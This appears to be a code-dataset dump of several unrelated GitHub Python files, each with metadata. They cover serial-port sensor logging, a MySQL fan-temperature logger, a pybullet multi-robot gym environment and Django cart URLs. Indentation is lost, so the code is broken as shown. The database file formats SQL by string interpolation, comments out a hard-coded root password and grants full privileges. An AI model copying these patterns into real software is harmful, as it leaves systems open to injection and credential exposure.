SAMPLING_INTERVAL = 0.5
global n_MOVEMENT_TO_UNDERSTAND
n_MOVEMENT_TO_UNDERSTAND = 4 #up down left right
global movements
movements = ["up\n","down\n","left\n","right\n"]
class SerialReader(threading.Thread):
def __init__(self, name, port_name, baud, data, event_run):
threading.Thread.__init__(self)
self.name = name
self.port_name = port_name
self.baud = baud
self.event_run = event_run
self.data = data
print("Attempting to open port %s at baud %d" %(self.port_name,self.baud))
self.port = serial.Serial(self.port_name,self.baud,timeout=1)
if(self.port.isOpen()): print("Port Open")
def run(self):
start_time = time.time()
running = True
while(running):
try:
#actual decoding
if(self.port.read(END_BUNDLE_BYTE).decode("raw_unicode_escape") == '!!!'):
temp = self.port.read(BUNDLE_LENGTH)
#print(temp)
for channel in range(0,NUM_CHANNELS):
self.data[channel] = (temp[channel*BYTE_PER_CHANNEL]<<8)|(temp[channel*BYTE_PER_CHANNEL + 1 ])
#allow the plotting thread to access the data
self.event_run.set()
self.event_run.clear()
time.sleep(SAMPLING_INTERVAL)
total_elapsed = time.time() - start_time
if(total_elapsed > ACQUISITION_TIME): #more than 30 seconds of acquisition
print("From %s, closing port"%self.name)
self.port.close()
running = False
except KeyboardInterrupt:
self.port.close()
break
class DynamicPlotter(threading.Thread):
def __init__(self,name,data,event_run):
threading.Thread.__init__(self)
# Scrive un file.
self.out_file = open("test.txt","w")
self.data = data
self.event_run = event_run
self.name = name
self.number_of_acq_total = ACQUISITION_TIME/SAMPLING_INTERVAL
self.number_of_acq_per_movement = self.number_of_acq_total/n_MOVEMENT_TO_UNDERSTAND
def run(self):
running = True
counter_total = 0
counter = 0
while(running):
self.event_run.wait()
#print("From %s, writing to the file!"%self.name)
self.out_file.write(str(self.data[0])) #only to avoid printing a coma
for value in self.data[1:]:
self.out_file.write(',')
self.out_file.write(str(value))
self.out_file.write('\n')
if(counter == 0):
print("Counter total:%d"%counter_total)
index = int(counter_total/self.number_of_acq_per_movement)
message = "Movement: %s"%movements[index]
#why is this working?
#let's suppose: counter=0 and counter_total =
print("%s: %s"%(self.name,message))
self.out_file.write(message)
counter_total += 1
counter += 1
if(counter == self.number_of_acq_per_movement):
#reset counter
counter = 0
#print("From %s, checking if set: %d!"%(self.name,self.event_close.is_set()))
if(counter_total == self.number_of_acq_total ): #6 acquisitions,
print("From %s, closing the file!"%self.name)
self.out_file.close()
running = False
if __name__ == "__main__":
#matrix that holds values read by
data = np.zeros(NUM_CHANNELS)
event_run = threading.Event()
try:
s = SerialReader("Serial Reader",PORT,BAUD,data,event_run)
p = DynamicPlotter("File maker",data,event_run)
s.start()
p.start()
s.join()
p.join()
except KeyboardInterrupt:
raise ValueError('Catch command to stop from keyboard')
sys.exit(0)
|
FrancesoM/UnlimitedHand-Learning
|
python_side/multithread.py
|
multithread.py
|
py
| 5,210 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "threading.Thread",
"line_number": 48,
"usage_type": "attribute"
},
{
"api_name": "threading.Thread.__init__",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "serial.Serial",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "threading.Thread.__init__",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 94,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 145,
"usage_type": "call"
},
{
"api_name": "threading.Event",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 162,
"usage_type": "call"
}
] |
16270189491
|
import pymysql
import datetime
def insert(outsideTemp, insideTemp, targetTemp, fanState):
sql = "INSERT INTO FANS ( `time`, `outside_temp`, `inside_temp`, `target_temp`, `fan_state`) "
sql += "VALUES ( \"{0}\", {1}, {2}, {3}, {4})".format(datetime.datetime.now(), outsideTemp, insideTemp, targetTemp, fanState)
try:
connection = pymysql.connect(host='localhost', db='fans')
#connection = pymysql.connect(host='localhost', user='root', db='fans', password='c0staRic4')
#connection = pymysql.connect(host='localhost', user='pi', db='fans')
cursor = connection.cursor()
#print(sql)
cursor.execute(sql)
connection.commit()
finally:
connection.close()
def select_today():
sql = "SELECT * FROM FANS WHERE DATE(time)=CURRENT_DATE()"
return select_sql(sql)
def select_last():
sql="select * from FANS order by time desc limit 1"
return select_sql(sql)
def select_sql(sql):
try:
connection = pymysql.connect(host='localhost', db='fans')
cursor = connection.cursor()
cursor.execute(sql)
result = cursor.fetchall()
finally:
connection.close()
return result
'''
CREATE USER 'pi'@'localhost';
GRANT ALL on *.* to 'pi'@'localhost' WITH GRANT OPTION;
create database fans;
use fans;
CREATE TABLE `FANS` (
`time` TIMESTAMP NOT NULL,
`outside_temp` FLOAT NOT NULL,
`inside_temp` FLOAT NOT NULL,
`target_temp` FLOAT NOT NULL,
`fan_state` BOOLEAN NOT NULL,
PRIMARY KEY (`time`)
);
INSERT INTO fans ( `time`, `outside_temp`, `inside_temp`, `fan_state`)
VALUES ( datetime.datetime.now(), 56.7, 74.0, TRUE )
'''
|
scottware/fans
|
database.py
|
database.py
|
py
| 1,653 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "datetime.datetime.now",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "pymysql.connect",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pymysql.connect",
"line_number": 29,
"usage_type": "call"
}
] |
73700516027
|
import os, time, gc
import numpy as np
import gym
import random
from gym import spaces
from gym.utils import seeding
from screeninfo import get_monitors
import pybullet as p
from .agents.objects import Object
from .util import Util
from .agents.agent import Agent
class BaseEnv(gym.Env):
def __init__(self, time_step=0.02, frame_skip=5, render=False, gravity=-9.81, seed=1001):
self.time_step = time_step
self.frame_skip = frame_skip
self.gravity = gravity
self.id = None
self.gui = False
self.gpu = False
self.view_matrix = None
self.seed(seed)
if render:
self.render()
else:
self.id = p.connect(p.DIRECT)
self.util = Util(self.id, self.np_random)
self.directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'assets')
# Define action space for each robot
self.action_space_robot = {}
for robot_name, robot_class in self.my_robots.items():
action_robot_len = len(robot_class.controllable_joint_indices)
# Add gripper action if gripper is enabled
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
action_robot_len += 1
elif len(self.gripper_enabled_robots) != len(self.my_robots):
print("Gripper enabling mode for robots needs to be defined for every single robot")
exit()
self.action_space_robot[robot_name] = spaces.Box(low=np.array([-1.0]*action_robot_len, dtype=np.float32), high=np.array([1.0]*action_robot_len, dtype=np.float32), dtype=np.float32)
# Define observation space for each robot
self.observation_space_robot = {}
for robot_name, robot_class in self.my_robots.items():
if len(self.obs_len_robots) == len(self.my_robots):
obs_robot_len = self.obs_len_robots[robot_name]
else:
print("Received observation lenghts for robots needs to be defined for every single robot")
exit()
self.observation_space_robot[robot_name] = spaces.Box(low=np.array([-1000000000.0]*obs_robot_len, dtype=np.float32), high=np.array([1000000000.0]*obs_robot_len, dtype=np.float32), dtype=np.float32)
self.plane = Agent()
def step(self, action):
raise NotImplementedError('Implement observations')
def _get_obs(self, agent=None):
raise NotImplementedError('Implement observations')
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def set_seed(self, seed=1000):
self.np_random.seed(seed)
def enable_gpu_rendering(self):
self.gpu = True
def disconnect(self):
p.disconnect(self.id)
def reset(self):
p.resetSimulation(physicsClientId=self.id)
if not self.gui:
# Reconnect the physics engine to forcefully clear memory when running long training scripts
self.disconnect()
self.id = p.connect(p.DIRECT)
self.util = Util(self.id, self.np_random)
if self.gpu:
self.util.enable_gpu()
# Configure camera position
p.resetDebugVisualizerCamera(cameraDistance=8, cameraYaw=90, cameraPitch=-30, cameraTargetPosition=[0, 0, 1], physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_MOUSE_PICKING, 0, physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_GUI, 0, physicsClientId=self.id)
p.setTimeStep(self.time_step, physicsClientId=self.id)
# Disable real time simulation so that the simulation only advances when we call stepSimulation
p.setRealTimeSimulation(0, physicsClientId=self.id)
p.setGravity(0, 0, self.gravity, physicsClientId=self.id)
self.last_sim_time = None
self.iteration = 0
self.task_success_clock = 0
self.task_success_switch = False
self.task_success = {}
for robot_name, robot in self.my_robots.items():
self.task_success[robot_name] = 0
self.updatable_objects = {}
Object.instances = []
self.threshold_picking = 0.02
def create_world(self):
# Load the ground plane
plane = p.loadURDF(os.path.join(self.directory, 'plane', 'plane.urdf'), physicsClientId=self.id)
self.plane.init(plane, self.id, self.np_random, indices=-1)
# Randomly set friction of the ground
# self.plane.set_frictions(self.plane.base, lateral_friction=self.np_random.uniform(0.025, 0.5), spinning_friction=0, rolling_friction=0)
# Disable rendering during creation
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0, physicsClientId=self.id)
# Create robots
for _, robot in self.my_robots.items():
robot.init(self.directory, self.id, self.np_random)
robot.set_gravity(0, 0, 0)
finger_COM_pos, _ = robot.get_finger_COM()
robot.finger_COM_sphere = self.create_sphere(radius=0.003, mass=0.0, pos=finger_COM_pos, collision=False, rgba=[0.5, 0.5, 0.5, 0.5])
def take_step(self, actions, gains=None, forces=None, action_multiplier=0.05, step_sim=True):
if self.last_sim_time is None:
self.last_sim_time = time.time()
self.iteration += 1
for i, (robot_name, robot) in enumerate(self.my_robots.items()):
robot_actions = actions[robot_name].copy()
robot_actions = np.clip(robot_actions, a_min=self.action_space_robot[robot_name].low, a_max=self.action_space_robot[robot_name].high)
robot_actions *= action_multiplier
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
joint_actions = robot_actions[:-1]
gripper_action = True if robot_actions[-1]<0 else False
else:
joint_actions = robot_actions
joint_actions *= robot.action_multiplier
# Append the new action to the current measured joint angles
robot_joint_angles = robot.get_joint_angles(robot.controllable_joint_indices)
# Update the target robot joint angles based on the proposed action and joint limits
for _ in range(self.frame_skip):
below_lower_limits = robot_joint_angles + joint_actions < robot.controllable_joint_lower_limits
above_upper_limits = robot_joint_angles + joint_actions > robot.controllable_joint_upper_limits
joint_actions[below_lower_limits] = 0
joint_actions[above_upper_limits] = 0
robot_joint_angles[below_lower_limits] = robot.controllable_joint_lower_limits[below_lower_limits]
robot_joint_angles[above_upper_limits] = robot.controllable_joint_upper_limits[above_upper_limits]
robot_joint_angles += joint_actions
robot.control(robot.controllable_joint_indices, robot_joint_angles, robot.motor_gains, robot.motor_forces)
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
self.update_grippable_objects(gripper_action, robot_name, robot)
if step_sim:
# Update all agent positions
for _ in range(self.frame_skip):
p.stepSimulation(physicsClientId=self.id)
self.update_targets()
self.update_objects()
self.update_robot_finger_COM()
if self.gui:
# Slow down time so that the simulation matches real time
self.slow_time()
def slow_time(self):
# Slow down time so that the simulation matches real time
t = time.time() - self.last_sim_time
if t < self.time_step:
time.sleep(self.time_step - t)
self.last_sim_time = time.time()
def update_targets(self):
pass
def update_objects(self):
pass
def update_grippable_objects(self, gripper_action, robot_name, robot):
all_distances = []
if self.gripper_enabled_robots[robot_name]:
for object_name, obj in self.all_grippable_objects.items():
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
finger_COM_pos, finger_COM_orien = robot.get_finger_COM()
obj_pos, _ = obj.get_pos_orient(joint)
dist_finger_COM_to_obj = abs(np.linalg.norm(obj_pos-finger_COM_pos))
all_distances.append(abs(dist_finger_COM_to_obj))
# When distance is lower than threshold then set robot.grippable[object_name]['grippable'] to True
robot.grippable[object_name]['grippable']['joint_'+str(joint)] = True if dist_finger_COM_to_obj < self.threshold_picking else False
# If robot is ready to grip and the object is grippable then update its position
if robot.grippable[object_name]['grippable']['joint_'+str(joint)] and gripper_action:
if robot.grippable[object_name]['constraint']['joint_'+str(joint)] is None:
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = p.createConstraint(robot.body, robot.end_effector, obj.body, joint, p.JOINT_POINT2POINT, [0, 0, 0], parentFramePosition=[0,0,0], childFramePosition=[0, 0, 0], parentFrameOrientation=[0,0,0,1], childFrameOrientation=[0, 0, 0, 1], physicsClientId=self.id)
# robot.control(robot.gripper_indices, robot.closed_gripper, robot.motor_gains, robot.motor_forces)
else:
robot.its_gripping = False
if robot.grippable[object_name]['constraint']['joint_'+str(joint)] is not None:
p.removeConstraint(robot.grippable[object_name]['constraint']['joint_'+str(joint)], physicsClientId=self.id)
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = None
# robot.control(robot.gripper_indices, robot.opened_gripper, robot.motor_gains, robot.motor_forces)
robot.visual_gripping = True if any(i<0.03 for i in all_distances) else False
constraints_list = []
for object_name, obj in self.all_grippable_objects.items():
for const_id, const in robot.grippable[object_name]['constraint'].items():
constraints_list.append(const)
if all(v is None for v in constraints_list):
robot.its_gripping = False
robot.control(robot.gripper_indices, robot.opened_gripper, robot.motor_gains, robot.motor_forces)
robot.buff = 0
else:
robot.its_gripping = True
if robot.buff == 0 and robot.visual_gripping:
robot.control(robot.gripper_indices, robot.closed_gripper, robot.motor_gains, robot.motor_forces)
robot.buff =+ 1
def update_robot_finger_COM(self):
for robot_name, robot in self.my_robots.items():
finger_COM_pos, _ = robot.get_finger_COM()
robot.finger_COM_sphere.set_base_pos_orient(finger_COM_pos, [0, 0, 0, 1])
def render(self, mode='human'):
if not self.gui:
self.gui = True
if self.id is not None:
self.disconnect()
try:
self.width = get_monitors()[0].width
self.height = get_monitors()[0].height
except Exception as e:
self.width = 1920
self.height = 1080
self.id = p.connect(p.GUI, options='--background_color_red=0.81 --background_color_green=0.93 --background_color_blue=0.99 --width=%d --height=%d' % (self.width, self.height))
self.util = Util(self.id, self.np_random)
def get_euler(self, quaternion):
return np.array(p.getEulerFromQuaternion(np.array(quaternion), physicsClientId=self.id))
def get_quaternion(self, euler):
return np.array(p.getQuaternionFromEuler(np.array(euler), physicsClientId=self.id))
def setup_camera(self, camera_eye=[0.5, -0.75, 1.5], camera_target=[-0.2, 0, 0.75], fov=60, camera_width=1920//4, camera_height=1080//4):
self.camera_width = camera_width
self.camera_height = camera_height
self.view_matrix = p.computeViewMatrix(camera_eye, camera_target, [0, 0, 1], physicsClientId=self.id)
self.projection_matrix = p.computeProjectionMatrixFOV(fov, camera_width / camera_height, 0.01, 100, physicsClientId=self.id)
def setup_camera_rpy(self, camera_target=[-0.2, 0, 0.75], distance=1.5, rpy=[0, -35, 40], fov=60, camera_width=1920//4, camera_height=1080//4):
self.camera_width = camera_width
self.camera_height = camera_height
self.view_matrix = p.computeViewMatrixFromYawPitchRoll(camera_target, distance, rpy[2], rpy[1], rpy[0], 2, physicsClientId=self.id)
self.projection_matrix = p.computeProjectionMatrixFOV(fov, camera_width / camera_height, 0.01, 100, physicsClientId=self.id)
def get_camera_image_depth(self, light_pos=[0, -3, 1], shadow=False, ambient=0.8, diffuse=0.3, specular=0.1):
assert self.view_matrix is not None, 'You must call env.setup_camera() or env.setup_camera_rpy() before getting a camera image'
w, h, img, depth, _ = p.getCameraImage(self.camera_width, self.camera_height, self.view_matrix, self.projection_matrix, lightDirection=light_pos, shadow=shadow, lightAmbientCoeff=ambient, lightDiffuseCoeff=diffuse, lightSpecularCoeff=specular, physicsClientId=self.id)
img = np.reshape(img, (h, w, 4))
depth = np.reshape(depth, (h, w))
return img, depth
def create_sphere(self, radius=0.01, mass=0.0, pos=[0, 0, 0], visual=True, collision=True, rgba=[0, 1, 1, 1], maximal_coordinates=False, return_collision_visual=False):
sphere_collision = p.createCollisionShape(shapeType=p.GEOM_SPHERE, radius=radius, physicsClientId=self.id) if collision else -1
sphere_visual = p.createVisualShape(shapeType=p.GEOM_SPHERE, radius=radius, rgbaColor=rgba, physicsClientId=self.id) if visual else -1
if return_collision_visual:
return sphere_collision, sphere_visual
body = p.createMultiBody(baseMass=mass, baseCollisionShapeIndex=sphere_collision, baseVisualShapeIndex=sphere_visual, basePosition=pos, useMaximalCoordinates=maximal_coordinates, physicsClientId=self.id)
sphere = Agent()
sphere.init(body, self.id, self.np_random, indices=-1)
return sphere
def randomize_init_joint_angles(self, min_dist=0.5, radius=2, joint_randomness=0.15):
done = False
while not done:
# random_angles = {}
# # Generate random angles for each robot
# for robot_name, robot in self.my_robots.items():
# random_angles[robot_name] = []
# for joint in robot.arm_joint_indices:
# random_angles[robot_name].append(self.np_random.uniform(robot.lower_limits[joint]*joint_randomness, robot.upper_limits[joint]*joint_randomness))
# robot.set_joint_angles(robot.arm_joint_indices, random_angles[robot_name])
for robot_name, robot in self.my_robots.items():
robot_pos, _ = robot.get_base_pos_orient()
random_end_effector_pos = [random.uniform(robot_pos[0]-radius, robot_pos[0]+radius),
random.uniform(robot_pos[1]-radius, robot_pos[1]+radius),
random.uniform(robot_pos[2], robot_pos[2]+radius)]
self.set_end_effector_pos(robot, random_end_effector_pos, threshold=1e-2, maxIter=100)
# Collect all joint pos and obj pos(last 4 joints is enough)
joints_pos = {}
for robot_name, robot in self.my_robots.items():
joints_pos[robot_name] = []
for joint in robot.arm_joint_indices[-5:]:
j_pos, _ = robot.get_pos_orient(joint)
joints_pos[robot_name].append(j_pos)
objects_pos = []
for obj in Object.instances:
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
obj_pos, _ = obj.get_pos_orient(joint)
objects_pos.append(obj_pos)
# Check for collision between robots and objects in the environment
done = True
for robot_name_i, robot_i in self.my_robots.items():
for robot_name_j, robot_j in self.my_robots.items():
if robot_name_i != robot_name_j:
joints_pos_i = joints_pos[robot_name_i]
joints_pos_j = joints_pos[robot_name_j]
for joint_pos_i in joints_pos_i:
for joint_pos_j in joints_pos_j:
dist = np.linalg.norm(joint_pos_i-joint_pos_j)
if abs(dist) < min_dist:
done = False
for robot_name, robot in self.my_robots.items():
for obj_pos in objects_pos:
joint_pos = joints_pos[robot_name]
dist = np.linalg.norm(joint_pos-dist)
if abs(dist) < min_dist:
done = False
def set_end_effector_pos(self, robot, target_position, target_orient=None, threshold=1e-15, maxIter=1000):
if target_orient is not None and len(target_orient) == 3:
target_orient = self.get_quaternion(target_orient)
closeEnough = False
iter = 0
dist2 = 1e30
while (not closeEnough and iter < maxIter):
joint_pos = p.calculateInverseKinematics(bodyIndex=robot.body, endEffectorLinkIndex=robot.end_effector, targetPosition=target_position, targetOrientation=target_orient, physicsClientId=self.id)
robot.set_joint_angles_all(joint_pos)
ls = p.getLinkState(robot.body, robot.end_effector)
newPos = ls[4]
diff = [target_position[0] - newPos[0], target_position[1] - newPos[1], target_position[2] - newPos[2]]
dist2 = (diff[0] * diff[0] + diff[1] * diff[1] + diff[2] * diff[2])
closeEnough = (dist2 < threshold)
iter = iter + 1
def disable_collision(self, obj_1, obj_2):
body_1 = obj_1.body
body_2 = obj_2.body
for i in range(p.getNumJoints(body_1, physicsClientId=self.id)):
for j in range(p.getNumJoints(body_2, physicsClientId=self.id)):
p.setCollisionFilterPair(body_1, body_2, i, j, 0, physicsClientId=self.id)
def get_euler(self, quaternion):
return np.array(p.getEulerFromQuaternion(np.array(quaternion), physicsClientId=self.id))
def get_quaternion(self, euler):
return np.array(p.getQuaternionFromEuler(np.array(euler), physicsClientId=self.id))
def init_env_variables(self):
# Select all grippable objects
i = 0
self.all_grippable_objects = {}
for obj in Object.instances:
if obj.enable_gripping:
i += 1
object_name = 'object_' + str(i)
self.all_grippable_objects[object_name] = obj
for robot_name, robot in self.my_robots.items():
robot.buff = 0
robot.grippable = {}
robot.ready_to_grip = False
for object_name, obj in self.all_grippable_objects.items():
robot.grippable[object_name] = {'obj': obj, 'grippable': {}, 'constraint': {}}
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = None
|
gabriansa/collaborative-gym
|
collaborative_gym/envs/base_env.py
|
base_env.py
|
py
| 20,082 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "gym.Env",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "pybullet.connect",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "pybullet.DIRECT",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "util.Util",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path.realpath",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "gym.spaces.Box",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "gym.spaces",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "gym.spaces.Box",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "gym.spaces",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "agents.agent.Agent",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "gym.utils.seeding.np_random",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "gym.utils.seeding",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "pybullet.disconnect",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "pybullet.resetSimulation",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "pybullet.connect",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "pybullet.DIRECT",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_name": "util.Util",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "pybullet.resetDebugVisualizerCamera",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "pybullet.configureDebugVisualizer",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "pybullet.COV_ENABLE_MOUSE_PICKING",
"line_number": 86,
"usage_type": "attribute"
},
{
"api_name": "pybullet.configureDebugVisualizer",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "pybullet.COV_ENABLE_GUI",
"line_number": 87,
"usage_type": "attribute"
},
{
"api_name": "pybullet.setTimeStep",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "pybullet.setRealTimeSimulation",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "pybullet.setGravity",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "agents.objects.Object.instances",
"line_number": 100,
"usage_type": "attribute"
},
{
"api_name": "agents.objects.Object",
"line_number": 100,
"usage_type": "name"
},
{
"api_name": "pybullet.loadURDF",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 105,
"usage_type": "attribute"
},
{
"api_name": "pybullet.configureDebugVisualizer",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "pybullet.COV_ENABLE_RENDERING",
"line_number": 110,
"usage_type": "attribute"
},
{
"api_name": "time.time",
"line_number": 120,
"usage_type": "call"
},
{
"api_name": "numpy.clip",
"line_number": 125,
"usage_type": "call"
},
{
"api_name": "pybullet.stepSimulation",
"line_number": 155,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 167,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 168,
"usage_type": "call"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 180,
"usage_type": "call"
},
{
"api_name": "numpy.linalg.norm",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "numpy.linalg",
"line_number": 183,
"usage_type": "attribute"
},
{
"api_name": "pybullet.createConstraint",
"line_number": 190,
"usage_type": "call"
},
{
"api_name": "pybullet.JOINT_POINT2POINT",
"line_number": 190,
"usage_type": "attribute"
},
{
"api_name": "pybullet.removeConstraint",
"line_number": 195,
"usage_type": "call"
},
{
"api_name": "screeninfo.get_monitors",
"line_number": 224,
"usage_type": "call"
},
{
"api_name": "screeninfo.get_monitors",
"line_number": 225,
"usage_type": "call"
},
{
"api_name": "pybullet.connect",
"line_number": 229,
"usage_type": "call"
},
{
"api_name": "pybullet.GUI",
"line_number": 229,
"usage_type": "attribute"
},
{
"api_name": "util.Util",
"line_number": 230,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "pybullet.getEulerFromQuaternion",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 236,
"usage_type": "call"
},
{
"api_name": "pybullet.getQuaternionFromEuler",
"line_number": 236,
"usage_type": "call"
},
{
"api_name": "pybullet.computeViewMatrix",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "pybullet.computeProjectionMatrixFOV",
"line_number": 242,
"usage_type": "call"
},
{
"api_name": "pybullet.computeViewMatrixFromYawPitchRoll",
"line_number": 247,
"usage_type": "call"
},
{
"api_name": "pybullet.computeProjectionMatrixFOV",
"line_number": 248,
"usage_type": "call"
},
{
"api_name": "pybullet.getCameraImage",
"line_number": 252,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number": 253,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number": 254,
"usage_type": "call"
},
{
"api_name": "pybullet.createCollisionShape",
"line_number": 258,
"usage_type": "call"
},
{
"api_name": "pybullet.GEOM_SPHERE",
"line_number": 258,
"usage_type": "attribute"
},
{
"api_name": "pybullet.createVisualShape",
"line_number": 259,
"usage_type": "call"
},
{
"api_name": "pybullet.GEOM_SPHERE",
"line_number": 259,
"usage_type": "attribute"
},
{
"api_name": "pybullet.createMultiBody",
"line_number": 262,
"usage_type": "call"
},
{
"api_name": "agents.agent.Agent",
"line_number": 263,
"usage_type": "call"
},
{
"api_name": "random.uniform",
"line_number": 279,
"usage_type": "call"
},
{
"api_name": "random.uniform",
"line_number": 280,
"usage_type": "call"
},
{
"api_name": "random.uniform",
"line_number": 281,
"usage_type": "call"
},
{
"api_name": "agents.objects.Object.instances",
"line_number": 294,
"usage_type": "attribute"
},
{
"api_name": "agents.objects.Object",
"line_number": 294,
"usage_type": "name"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 295,
"usage_type": "call"
},
{
"api_name": "numpy.linalg.norm",
"line_number": 308,
"usage_type": "call"
},
{
"api_name": "numpy.linalg",
"line_number": 308,
"usage_type": "attribute"
},
{
"api_name": "numpy.linalg.norm",
"line_number": 315,
"usage_type": "call"
},
{
"api_name": "numpy.linalg",
"line_number": 315,
"usage_type": "attribute"
},
{
"api_name": "pybullet.calculateInverseKinematics",
"line_number": 326,
"usage_type": "call"
},
{
"api_name": "pybullet.getLinkState",
"line_number": 328,
"usage_type": "call"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 338,
"usage_type": "call"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 339,
"usage_type": "call"
},
{
"api_name": "pybullet.setCollisionFilterPair",
"line_number": 340,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 343,
"usage_type": "call"
},
{
"api_name": "pybullet.getEulerFromQuaternion",
"line_number": 343,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 346,
"usage_type": "call"
},
{
"api_name": "pybullet.getQuaternionFromEuler",
"line_number": 346,
"usage_type": "call"
},
{
"api_name": "agents.objects.Object.instances",
"line_number": 352,
"usage_type": "attribute"
},
{
"api_name": "agents.objects.Object",
"line_number": 352,
"usage_type": "name"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 364,
"usage_type": "call"
}
] |
40633067575
|
from django.urls import path
from .views import (
add_to_cart,
delete_from_cart,
order_details,
checkout,
update_transaction_records,
success
)
app_name = 'cart'
urlpatterns = [
path('^add-to-cart/<int:pk>/<slug:slug>/', add_to_cart, name="add_to_cart"),
path('^order-summary/', order_details, name="order_summary"),
path('^success/$', success, name='purchase_success'),
path('^item/delete/<int:pk>/<slug:slug>/', delete_from_cart, name='delete_item'),
path('^checkout/', checkout, name='checkout'),
# path('^update-transaction/(?P<token>[-\w]+)/', update_transaction_records,
# name='update_records')
]
|
sadakchap/cfe-ecom
|
cart/urls.py
|
urls.py
|
py
| 662 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "django.urls.path",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "views.add_to_cart",
"line_number": 14,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "views.order_details",
"line_number": 15,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "views.success",
"line_number": 16,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "views.delete_from_cart",
"line_number": 17,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "views.checkout",
"line_number": 18,
"usage_type": "argument"
}
] |
16647141836
|
import os
import pandas as pd
import numpy as np
from tqdm.auto import tqdm
from textaugment import EDA
from nltk.tokenize import word_tokenize
class DataProcessing:
